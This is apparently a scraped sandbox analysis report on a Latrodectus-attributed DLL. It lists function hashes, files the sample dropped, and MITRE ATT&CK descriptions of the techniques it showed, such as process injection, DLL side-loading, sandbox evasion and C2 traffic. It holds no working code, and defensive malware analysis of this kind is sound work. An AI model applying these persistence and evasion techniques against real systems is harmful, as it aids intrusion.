Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_afterupdate
API String ID: 3702945584-2434204715
Opcode ID: beb1ae4346af73a663e5dbad8c0c0307e5cc816e0ab553eec07c274b3700ac5b
Instruction ID: 47f7e770178fe590bed8ec104acc410721906707dfe2e3d629c186be1f535818
Opcode Fuzzy Hash: beb1ae4346af73a663e5dbad8c0c0307e5cc816e0ab553eec07c274b3700ac5b
Instruction Fuzzy Hash: 300188B2601B4482DB109F69D844389B760F788BB0F00831AEA79137E4DF78C699CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018008455E Relevance: 5.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 000000018008457B
_CxxThrowException.MSVCRT ref: 000000018008459B
_CxxThrowException.MSVCRT ref: 00000001800845BE
_CxxThrowException.MSVCRT ref: 00000001800845E1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 360total.dll.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_360_68c96245dd5f839ff441fb79a97a9b35299d069_9cecb875_e8b4a60c-0a4b-406f-b4de-e74f5b66cb69\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_360_f6ce5fb8c554a1c5617cb52ea4bda5a5f52864d1_9cecb875_70d5a318-011b-4b09-9f21-f60ccd1d195e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C76.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D80.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DB0.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER93A5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9413.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9443.tmp.xml

C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll

C:\Users\user\AppData\Roaming\Custom_update\update_data.dat

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

Windows Analysis Report
360total.dll.dll

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre